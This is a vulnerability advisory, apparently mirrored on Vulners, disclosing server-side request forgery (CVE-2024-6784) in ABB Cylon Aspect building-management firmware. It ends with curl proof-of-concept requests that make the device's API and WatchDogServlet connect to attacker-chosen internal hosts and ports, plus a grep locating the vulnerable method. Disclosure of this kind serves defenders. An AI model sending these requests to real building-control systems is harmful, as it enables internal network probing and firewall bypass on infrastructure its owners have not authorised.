Lucene search
K

ABB Cylon Aspect 3.08.02 (API/Servlets) Server-Side Request Forgery (SSRF)

🗓️ 11 Dec 2024 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 673 Views

ABB Cylon Aspect 3.08.02 has SSRF vulnerabilities allowing unauthorized system access and data exposure.

Related
Code
<html><body><p>ABB Cylon Aspect 3.08.02 (API/Servlets) Server-Side Request Forgery (SSRF)


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: &lt;=3.08.02
                  ErgoTech MIX Deployment Server &lt;=2.0.0

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: ABB Cylon Aspect is affected by multiple Server-Side Request Forgery
(SSRF) vulnerabilities. These vulnerabilities allow authenticated attackers
to exploit APIs and internal functions to make arbitrary network requests.
This could result in unauthorized access to internal systems, data exfiltration,
or bypassing firewall protections.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5877
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5877.php
CVE ID: CVE-2024-6784
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6784


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 


$ curl -X PUT "http://192.168.73.31/api/sslClient/getCertFromHost" \
&gt; -H "Cookie: PHPSESSID=xxx" \
&gt; -H "Content-Type: application/json" \
&gt; -d "{\"hostOrIp\":\"127.0.0.1\",\"port\":\"443\"}"

$ curl -X PUT "http://192.168.73.31/api/sslClient/testSslConnection" \
&gt; -H "Cookie: PHPSESSID=xxx" \
&gt; -H "Content-Type: application/json" \
&gt; -d "{\"hostOrIp\":\"127.0.0.1\",\"port\":\"443\",\"sslMode\":0}"

$ curl "http://192.168.73.31:7226/servlets/WatchDogServlet?host=localhost&amp;port=4222&amp;timeOut=2000" \
&gt; -H "Cookie: PHPSESSID=xxx"

$ grep -irnH "checkHostAndPortReachable" .
./com/aamatrix/util/ssl/SslUtils.java:719:   public static void checkHostAndPortReachable(String host, int port, int timeout) throws SslUtilsException {
./com/aamatrix/servlets/EMapServicesHandler.java:558:   SslUtils.checkHostAndPortReachable(hostOrIp, port, timeout);
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2024 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.9
CVSS 48.7
EPSS0.00501
SSVC
673